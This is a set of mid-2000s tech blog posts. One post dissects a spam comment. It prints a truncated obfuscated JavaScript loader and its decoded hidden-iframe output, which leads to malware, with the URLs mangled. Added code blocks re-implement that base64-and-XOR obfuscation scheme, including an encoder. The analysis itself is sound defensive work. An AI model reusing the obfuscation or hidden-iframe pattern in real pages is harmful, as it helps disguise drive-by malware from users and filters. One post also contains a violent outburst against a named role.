Must Have Software

Well, my motherboard died over the weekend, so I had to rebuild and reinstall everything.  Must have software is the software you install first, right?  Here is the list, in order.

  1. Windows Server 2003
  2. Motherboard Drivers
  3. Firefox
  4. Windows Update –
    1. Win2K3 SP1
    2. About 49 other patches
  5. Microsoft Office
  6. Microsoft Lookout
  7. Microsoft Visual Studio 2005 Professional
  8. Microsoft Money
  9. Google Picasa
  10. Google Toolbar (got a big ad when browsing Google’s homepage)
  11. Macromedia Flash
  12. Van Dyke SecureCRT
  13. Motorola Phone
  14. Techsmith SnagIt
  15. NSIS
  16. Windows Live Writer
  17. Macromedia Fireworks

Lots of Microsoft in that list!

Understanding Google’s Indexing

Matt Cutts posted a fantastic description of what happened to a hapless Webmaster when his site was hacked and delisted from Google. 

I thought it was pretty interesting to know how much detailed analysis went into the problem, and I was impressed by Matt’s professionalism.  Like Matt, I hope that we (as software professionals and as an industry) are able to get better over time at letting people know what is going wrong.  But I think it’s pretty amazing how much self-diagnosis some of our modern services are already doing.

Excel Programming and IgnoreRemoteRequests

I’ve been dabbling with complex spreadsheet work, and I needed to actually write some code to run in Excel.  It turns out that Excel, while it is programmable, is fragile and easy to break.

The first problem I ran into was that as my program was running, I could start another Excel application which would interfere with the Excel instance I was using.  I was surprised by this, but reasonably happy that the solution was to simply set the Application.IgnoreRemoteRequests in my instance of Excel, and no longer broken by other Excel instances.

However, a few days later, I discovered Excel was completely broken on my machine.  It refused to open a spreadsheet from an email attachment, or from the desktop!  This was quite scary, and initially I didn’t know the cause at all.  Turns out there are lots of posts on the net about this – and it is relatively easy to fix – go to the Tools|Options|General tab in Excel, and make sure that the item “Ignore Other Applications” is UNchecked.

Wait a minute – doesn’t “Ignore Other Applications” and “IgnoreRemoteRequests” sound pretty similar?  Why yes it does.  It turns out that when an Excel extension temporarily sets this setting, Excel persists it when it closes!  Whoa!  That is very fragile.  This means that if a plugin ever sets this setting and forgets to unset it, the user is left in the lurch forever! 

For the non-programmers out there, you might think that this is the fault of the Plugin, and that isn’t completely unreasonable.  But more accurately, this is the fault of Excel’s API being simply too fragile.  Very few APIs in the programming world work this way – where what seems to be a transient setting is actually saved permanently.  Further, if anything goes wrong with the plugin, there is no way to make a “failsafe” for this from the Plugin side.   Excel saves this setting behind the programmer’s back, and the programmer has no way to know when this setting is saved.  If you can’t know when it is saved, you obviously can’t know exactly when to ‘undo’ it either.  We can “hack” it, but we can’t fix it.

So, if you run into this problem, where Excel refuses to load files from email or the desktop, you’ll likely find lots of sites which tell you this same fix (Tools|Options|General|”Ignore Other Applications” = unchecked).  And it will work.  Those sites may further say something like, “this is usually due to a faulty plugin”.  All right, sort of.  But Excel is a far too easily broken interface.  If you are a programmer, you probably would do best to not write addins for Excel.  Your code will probably never be robust.

Norton AntiVirus is the Worst Program Ever

I made the mistake of installing Norton AntiVirus as part of Google Pack.  I guess I thought I would be nice to my new employer and try out the Pack. 

I’ve tried Norton a few times in the past – each time I uninstall it due to being a total system hog.  Once again, I’ve had the same experience.

My laptop is a few years old; it’s only got 256MB of RAM, but it runs fine.  But today, the first time booting since installing Norton, it took me 15 minutes to regain control of the system (this is not an exaggeration!!  I couldn’t get control of the mouse, the task manager, nothing for 15 minutes!).  Norton just completely monopolizes the disk and CPU.

It’s no wonder viruses spread so easily.  Norton has turned into the same bloatware you’d expect from Adobe or Microsoft, so of course users disable it.  It sucks.  Yes, Norton, we want you to scan for viruses.  But no, this is not permission to completely rape and pillage our hardware and prevent us from getting our work done.

Well, the uninstall of Norton is just about done now, so I’m done with this blog entry.  I hope the numbskull PM at Norton that thought that “well, if users can’t see that it is scanning we won’t get brand recognition” dies a cruel and horrible death.  I’ll be working hard within my company to make sure we get Norton out of the Google Pack.  It just isn’t Googley.

Avoiding Automated Account Creation

For several years, many sites have been using “CAPTCHAs” to ensure there is a real person signing up for an account.  We’ve all seen them – these are the questions where the user is asked to type in the letters of a distorted image before proceeding to the next step.

I just went to create a new GMail account, and I pleasantly discovered a new system, hopefully even more tricky for spammers to work around.  The GMail system requires that it be able to send an SMS message to your cellphone before it will let you create an account.  They will only allow 10 accounts per phone number to sign up.  So, even if the spammer manages to get 100 phones, he’s still not getting a very large number of GMail accounts. 

Of course, if you don’t have an SMS-capable cell-phone, I guess you are out-of-luck!  Maybe others have seen this already and I’m slow to notice.  But I thought this was pretty cool.

Hotmail Trains Users to be Phishing Victims

Since I know a few people at Microsoft on the Hotmail team, I’m hoping one of them will read this article and fix the problem. 

In short, Microsoft and Hotmail are helping internet users get phished due to Hotmail’s poor security practices.

There is a very nice summary of phishing techniques written up here.  One of the major problems they emphasize is how many existing and reputable sites condition users to ignore security.  Security is a tough enough problem to begin with, and the UI in our browsers is clearly deficient.  But on top of that, we’ve got companies like Microsoft not even practicing what they preach, and conditioning users to ignore security warnings.

My example today comes from Hotmail.  I’ve been seeing this problem for several months now, and I’m getting sick of it.  When you go to the hotmail site and try to login, you’ll be presented with the security box, indicating to the user that the certificate is invalid.  Unless you are a 100%-pure geek like me, you probably don’t know why it is invalid, or even what it really means.  You do know that, in this case, you’ll probably get to read your email if you click OK.  So you ignore the problem.  WARNING – you could have just been phished.  And, when you go to the next site that presents that warning, what will you do?

This problem is very fixable.  Hotmail is in the process of changing the product name from hotmail to live mail, and they are redirecting in a way which exposes this problem.  This is really just laziness – it is a simple problem to fix by making your domain names match the names in your certificates.

When Microsoft won’t even configure their websites correctly, how can we expect the smaller and more ignorant companies to do so?  You might as well take all the dialog boxes in Internet Explorer and replace them with this (credit to the University of Auckland for the image):
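The check the browser is performing when it throws up that dialog, as an added example (this is not Hotmail’s code, and the certificate contents below are constructed, not what Hotmail actually served): the hostname the browser ended up connecting to after the redirect has to appear in the certificate, either exactly or via a single-label wildcard. The hostnames, certificate and redirect chain are assumptions for illustration.

```javascript
'use strict';
// Added example, not Hotmail's code: the hostname check a browser applies to a
// server certificate, in the style of RFC 2818 section 3.1. All names constructed.

// Does one certificate name (subject CN or a dNSName SAN entry) cover `host`?
//  - case-insensitive, trailing dots ignored;
//  - a wildcard counts only as the entire left-most label ("*.example.com");
//  - "*" matches exactly one label, so "*.example.com" covers neither
//    "a.b.example.com" nor "example.com";
//  - a wildcard needs at least two labels after it ("*.com" is rejected).
function nameCoversHost(name, host) {
  const n = name.toLowerCase().replace(/\.$/, '');
  const h = host.toLowerCase().replace(/\.$/, '');
  if (!n.includes('*')) return n === h;
  const nameLabels = n.split('.');
  const hostLabels = h.split('.');
  if (nameLabels[0] !== '*' || nameLabels.length < 3) return false;
  if (nameLabels.slice(1).some(l => l.includes('*'))) return false;
  if (hostLabels.length !== nameLabels.length) return false;
  return hostLabels.slice(1).join('.') === nameLabels.slice(1).join('.');
}

// A certificate covers `host` if any SAN dNSName matches; the subject CN is
// consulted only when the certificate carries no SAN entries.
function certCoversHost(cert, host) {
  const names = (cert.dnsNames && cert.dnsNames.length) ? cert.dnsNames : [cert.commonName];
  return names.some(n => nameCoversHost(n, host));
}

// Model of the post's situation: the user types one hostname, gets redirected to
// another, and the certificate served at the final hop must name that final host.
function checkRedirectChain(hops, certsByHost) {
  const finalHost = hops[hops.length - 1];
  const cert = certsByHost[finalHost];
  if (!cert) return { host: finalHost, ok: false, reason: 'no certificate for ' + finalHost };
  const ok = certCoversHost(cert, finalHost);
  const names = cert.dnsNames && cert.dnsNames.length ? cert.dnsNames : [cert.commonName];
  return {
    host: finalHost,
    ok,
    reason: ok ? 'name matches' : 'certificate names ' + JSON.stringify(names) + ' do not include ' + finalHost,
  };
}

// Constructed data: a certificate issued for the old domain that is still served
// after the service moves to a new brand's domain. Not Hotmail's real names.
const OLD_CERT = {
  commonName: 'login.oldmail.example',
  dnsNames: ['login.oldmail.example', '*.oldmail.example'],
};
const CERTS = {
  'login.oldmail.example': OLD_CERT,
  'mail.newbrand.example': OLD_CERT,   // the mistake: old cert on the new hostname
};
```

`checkRedirectChain(['www.oldmail.example', 'mail.newbrand.example'], CERTS)` reports the mismatch a user would be asked to click through; the same chain ending at `login.oldmail.example` passes. Nothing in the certificate is wrong in either case, only the name it is served under.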

Dissection of a Spam Comment

I get lots of spam comments on my blog each day.  Most are a similar looking spam with a bunch of links.  I moderate all comments to avoid spam, so none of this ever makes it to the site.  But today I got curious – what is this spam for?  Who sends it?

Manually following the URLs in my browser yields some javascript alerts where they are trying to get me to click “OK”.  Let’s see what happens if you do that.  It’s very interesting!

First off, you get the following script.  This is a complicated JavaScript masking technique.  Let’s look at the code.

   1: <script>
   2: function bNVEXM(inp)
   3:  {
   4:    var k="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh...
   5:    var out="";
   6:    var c1,c2,c3="";
   7:    var e1,e2,e3,e4="";
   8:    var i=0; 
   9:    do { 
  10:      e1=k.indexOf(inp.charAt(i++));
  11:      e2=k.indexOf(inp.charAt(i++));
  12:      e3=k.indexOf(inp.charAt(i++));
  13:      e4=k.indexOf(inp.charAt(i++)); 
  14:      c1=(e1<<2)|(e2>>4);
  15:      c2=((e2&15)<<4)|(e3>>2);
  16:      c3=((e3&3)<<6)|e4;
  17:      out+=String.fromCharCode(c1); 
  18:      if(e3!=64){
  19:        out+=String.fromCharCode(c2)
  20:      };
  21:      if(e4!=64){
  22:        out+=String.fromCharCode(c3);
  23:      } 
  24:    } while(i<inp.length);
  25:    return out; 
  26:  }
  27:   
  28:  function fDVGFV(a1,b1){
  29:    if(!b1){
  30:      return eval(bNVEXM("ZG9jdW1lbnQud3JpdGUo...
  31:    } 
  32:    var i; 
  33:    var o="";
  34:    var k=314; 
  35:    a1=bNVEXM(a1);
  36:    for(i=0;i<a1.length;i++) {
  37:      o+=String.fromCharCode((a1.charCodeAt(i)-32)^b1.charCodeAt((i%2)?i%k:Math.abs(k-i-1))%k);
  38:    }
  39:    return o;
  40:  }
  41:   
  42:  fDVGFV('YVxJUVNEUW5BNpiaaV59NWE2Zj4hNCYyNmQqPy8+bmpj...
  43:  </script>

Pretty complicated, huh? Well, it’s not too hard to decipher.  The heart of it is line 42, calling the function fDVGFV().  The argument is an encrypted string of javascript code.  At line 30 (when there is only one argument passed in), it converts the first argument into javascript code, and calls eval to run that javascript code.  That intermediate javascript happens to decode into the following single line:

   1:  document.write(fDVGFV(a1,arguments.callee.toString().replace(/s/g,"")));
 

So basically, it just does a minor transform on its own source code to derive a key, and then passes the input to be decoded again with that key.  Finally, the loop in lines 36-38 actually converts it to text which can be rendered, and the final HTML output becomes (I added xxx to mangle the URLs):

<IFRAME SRC="http://xxxjoutweb.netxxx/fr/?id=us141" WIDTH=1 HEIGHT=1></IFRAME>
<IFRAME SRC="http://xxxfrlynx.infoxxx/fr/?id=us141" WIDTH=1 HEIGHT=1></IFRAME>

These iframes are what actually load the final webpages into your browser.  After following through a few additional iframes, both of these will ultimately land you at a javascript dialog pushing SpySheriff (see WikiPedia’s description), a well known malware program.  The product is signed with a valid certificate to HiPoint, Ltd, based out of Panama, issued by Thawte.  If you thought that a digital signature means software is safe, you are wrong.  A code-signing certificate proves who signed the binary and that it hasn’t been altered since; it says nothing about what the binary does.  Anyone who can buy a certificate can sign software, even if it is malware…

I can’t seem to find anyone’s explanation of why SpySheriff exists.  But they employ a lot of code to try to get their junk distributed, and they are very persistent.  All this sophistication in their javascript is to camouflage the javascript so that spam-detection techniques don’t work.  It’s unfortunate that the javascript “eval” function exists at all – I happen to agree with Eric Lippert on this issue.  Eval is not really necessary, and it creates massive security issues for everyone in addition to helping jerks like SpySheriff circumvent spam detectors.  (See again WikiPedia on the subject)
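The decoding scheme above, as an added example that is not the spam’s own code: the same two layers (base64, then a byte-wise XOR against a long key) re-implemented with the final eval()/document.write() replaced by a function that returns the decoded HTML, which is how an analyst unwraps a sample without running it. One detail worth noticing: as printed on line 1 of the intermediate script, the key is the decoder function’s own source text with every letter “s” removed (`/s/g`, not `/\s/g`), so in engines where Function.prototype.toString returns the source, any edit to that function, including reformatting it for readability, changes the key and the decode produces garbage. The key, hostnames and payload below are constructed, and Node’s Buffer stands in for the hand-rolled base64 routine.

```javascript
'use strict';
// Added example, not the spam's code: its two-layer decoder re-implemented so the
// last stage RETURNS the decoded markup instead of passing it to eval() or
// document.write(). Key, payload and hostnames are constructed for the demo.

const K = 314;  // the modulus hard-coded in the spam's fDVGFV()

// Key position read for plaintext index i: odd i reads key[i % K], even i reads
// key[K - i - 1]. Copied from the spam's index expression.
function keyIndex(i) {
  return (i % 2) ? i % K : Math.abs(K - i - 1);
}

// charCodeAt() past the end of the key yields NaN, which ^ treats as 0; the same
// silent fallback happens in the original if its key is shorter than K chars.
function keyByte(key, i) {
  const c = key.charCodeAt(keyIndex(i)) % K;
  return Number.isNaN(c) ? 0 : c;
}

// Inverse of the spam's loop: (plain ^ key) + 32, then base64. 'latin1' keeps
// one character per byte so the +32 offset survives the round trip.
function obfuscate(plain, key) {
  let bytes = '';
  for (let i = 0; i < plain.length; i++) {
    bytes += String.fromCharCode((plain.charCodeAt(i) ^ keyByte(key, i)) + 32);
  }
  return Buffer.from(bytes, 'latin1').toString('base64');
}

// The spam's fDVGFV(a1, b1) loop with eval() and document.write() removed.
function deobfuscate(cipherB64, key) {
  const a1 = Buffer.from(cipherB64, 'base64').toString('latin1');
  let out = '';
  for (let i = 0; i < a1.length; i++) {
    out += String.fromCharCode((a1.charCodeAt(i) - 32) ^ keyByte(key, i));
  }
  return out;
}

// Pull the indicators out of the decoded markup without rendering it.
function extractIframeSources(html) {
  const re = /<iframe[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  const found = [];
  let m;
  while ((m = re.exec(html)) !== null) found.push(m[1]);
  return found;
}

// Constructed sample: two 1x1 iframes on reserved .invalid hosts, and a key long
// enough (>= K chars) for every position keyIndex() can produce. The spam instead
// uses its own function source, minus every "s", as the key.
const SAMPLE_HTML =
  '<IFRAME SRC="http://dropper1.example.invalid/fr/?id=us141" WIDTH=1 HEIGHT=1></IFRAME>' +
  '<IFRAME SRC="http://dropper2.example.invalid/fr/?id=us141" WIDTH=1 HEIGHT=1></IFRAME>';
const SAMPLE_KEY = 'constructed key, not the spam function source. '.repeat(8);
const SAMPLE_CIPHER = obfuscate(SAMPLE_HTML, SAMPLE_KEY);

// What an analyst wants from a sample: the decoded markup and the URLs in it.
function analyze(cipherB64, key) {
  const html = deobfuscate(cipherB64, key);
  return { html, iframes: extractIframeSources(html) };
}

// A key off by a single character (what reformatting the spam's function would do
// to a source-derived key) no longer decodes: the anti-analysis property.
function keyIsTamperSensitive() {
  return deobfuscate(SAMPLE_CIPHER, 'x' + SAMPLE_KEY) !== SAMPLE_HTML;
}
```

Run under Node; `analyze(SAMPLE_CIPHER, SAMPLE_KEY).iframes` lists the two constructed dropper URLs, and `keyIsTamperSensitive()` shows why pretty-printing the original function before running it breaks the decode. Against a real sample the key is obtained the same way the spam obtains it, by taking the function text verbatim and stripping the “s” characters, with `eval` and `document.write` pointed at a capture function.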

It’s probably worth noting that this security problem, while commonly blamed on Microsoft’s IE, actually originates in Javascript itself, which was invented by Netscape way back in 1995 or so.  IE just copied it with bug-for-bug compatibility!  (Granted, that was over 10 years ago…)

Friendster now has lawyer-value: Patents

GigaOM writes that “Friendster just wrote in to tell us it has been granted a second social networking patent.”  Oh joy.

As I have written before, software patents don’t work.  Soon enough, we’ll see some lawyers talking to Friendster about going after MySpace, Orkut, LinkedIn, Tribe, Tagged, and others for violation of this silly patent.  The money is just too alluring.

Nobody Wins
Let’s say Friendster is right, and that the others are “infringing” (I am making no judgement, but let’s be hypothetical).  Nobody uses Friendster because their service has been miserable.  The service is slow and they just failed to build the right features.  Myspace, Facebook, and even Orkut, have all performed much better and have orders of magnitude more users.  If Friendster were to win a patent-infringement suit, these other companies will either have to pay Friendster hoards of cash (which will just be pocketed by lawyers), or stop offering these features, or both.  In any event – the users of social networking will be the losers – as the products they use will have fewer features and possibly even carry additional fees.  Keep in mind that none of this affected Friendster’s fall – they failed only due to their own poor execution.

Proof of Invalidity
Now, you could say that Friendster pioneered this space and that is why they got the patent.  But this is not true.  The notion of uploading pictures associated with a profile is too obvious and simple.  If you read the patent, you’ll see that covered under this patent would be the notion of uploading a picture to an access-controlled or moderated bulletin board (you have a group of registered users, and there is a “degree of separation” which is enforced via the access control).  Clearly, this was done years ago, and Friendster’s patent is invalid.  The USPTO is just not capable of differentiating patent-worthy from bull. 

Sadly, there is a whole army of lawyers that will argue against my example, for they want their own piece of the pie, even if the only way to do it is to steal from those that actually created something useful.

How Times Change

FEBRUARY, 1999:  During testimony in federal court, Microsoft presents a video to show how Internet Explorer cannot be removed from Windows 98 without degrading system performance and other negative impacts.  Government attorney David Boies catches a small mistake in the video, and it is discovered that the video is actually spliced from two machines.  Microsoft’s Jim Allchin claims this was an honest mistake, that IE must be bundled into the operating system, and to remove it would hinder innovation. In the end, Microsoft wins the browser war.  (See also: NY Times)

OCTOBER, 2006:  Microsoft ships Internet Explorer 7, the first major release of a browser from Microsoft in several years.  Microsoft is no longer embroiled in competition with Netscape, and instead faces eroding market share to open-source rival Firefox.  Apparently whatever happened in 1999 which made IE so tightly coupled with the OS is now irrelevant, because this browser no longer has unified navigation with the shell (see here), can easily be installed and uninstalled, and even runs side-by-side with IE6.

I hate to look a gift horse in the mouth, but which one is it?  I guess technology has improved and now Microsoft has the technology to no longer bundle browsers.  Of course, Netscape had this technology in 1993.  On the positive side, IE7 is a huge leap forward, and it’s great that users can choose to either use IE6, IE7, or Firefox.  Choice is good!

Search History

While listening to Google’s earnings announcement today, I learned about Google’s new, searchable News Archive.  It allows you to search news articles going back 200 years!  Unfortunately, much of the really old content is paid content.  But you can go back to the early 1900s and see a fair amount of “free” content too.  Be sure to do an advanced search and select “Return articles with the following price:  no price”.

I don’t really have a great use for this, but it is fun to have history at your fingertips.  Here are a couple of interesting news events I found:

The Assassination, Time Magazine, November 29, 1963

Earthquake in San Francisco, Guardian Unlimited, April 19, 1906

I also learned that in 1957, one Dr Joseph Belshe and a team of doctors plugged a patient into a power outlet as a makeshift defibrillator.  Sweet!

I do look forward to more content coming online through the search archives; there isn’t nearly as much as I’d like to see yet!